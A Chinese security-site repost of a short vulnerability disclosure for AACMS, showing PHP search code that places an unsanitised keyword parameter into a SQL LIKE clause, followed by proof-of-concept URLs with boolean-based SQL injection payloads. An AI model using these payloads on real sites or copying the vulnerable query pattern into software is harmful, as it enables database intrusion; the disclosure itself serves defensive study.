AACMS 搜索型注入 - 脚本漏洞

admin 2021年4月3日19:37:03评论37 views字数 481阅读1分36秒阅读模式

   By:匿名者

    表示官方就是 ~~

以下是引用片段:

include_once 'common.php';

$keyword = $_REQUEST['keyword']; //.....!@#$%^&*

if(empty($keyword)) sexit($lang['arg_error']);
       
$where = '';

$where .= " title LIKE '%{$keyword}%'";//%模糊查询,。

$title = '搜索';

....
       
include template('search');

    POC:

http://127.0.0.1/search.php?keyword=w%'%20and%201=1%20and%20'%'='  //and 1=1

http://127.0.0.1/search.php?keyword=w%'%20and%201=2%20and%20'%'='  //and 1=2

http://127.0.0.1/search.php?keyword={关键字}{SQL}

文章来源于lcx.cc:AACMS 搜索型注入 - 脚本漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:37:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AACMS 搜索型注入 - 脚本漏洞https://cn-sec.com/archives/323921.html

发表评论

匿名网友 填写信息